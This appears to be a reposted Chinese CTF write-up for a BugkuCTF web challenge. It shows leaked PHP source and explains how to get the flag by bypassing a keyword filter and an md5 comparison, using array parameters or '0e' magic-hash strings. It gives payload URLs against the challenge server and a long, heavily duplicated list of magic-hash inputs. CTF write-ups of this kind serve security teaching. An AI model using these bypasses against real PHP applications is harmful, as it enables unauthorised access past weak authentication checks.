BugkuCTF

Posted pangya

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BugkuCTF相关的知识,希望对你有一定的参考价值。

1.听说备份是个好习惯

访问时,有一串md5

d41d8cd98f00b204e9800998ecf8427ed41d8cd98f00b204e9800998ecf8427e

解密说是空密码。

然后进行目录扫描,发现源码泄露。

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER[REQUEST_URI], ?);
$str = substr($str,1);
$str = str_replace(key,‘‘,$str);
parse_str($str);
echo md5($key1);

echo md5($key2);
if(md5($key1) == md5($key2) && $key1 !== $key2){
    echo $flag."获取flag";
}
?>
1. $str=str_replace(key,‘‘,$str) //replace替换  key会替换成空。使用kekeyy绕过
2. md5($key1)==md5($key2)       //key1 和key2的md5值要相同
3.  $key1!==$key2                  //key1和key2值要不相同

第一种

md5()函数无法处理数组,如果传入的为数组,会返回NULL

payload :http://123.206.87.240:8002/web16/?kkeyey1[]=1&kkeyey2[]=a

第二种

php弱类型绕过构造提交的值md5(),开头为0e

payload:http://123.206.87.240:8002/web16/?kkeyey1=s878926199a&kkeyey2=s155964671a

提供常用的php弱类型

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020<

 

以上是关于BugkuCTF的主要内容,如果未能解决你的问题,请参考以下文章

安全-GET(BugkuCTF)

安全-滑稽(BugkuCTF)

BugkuCTF web2

BugkuCTF web基础$_GET

BugkuCTF web基础$_POST

安全-eval(BugkuCTF)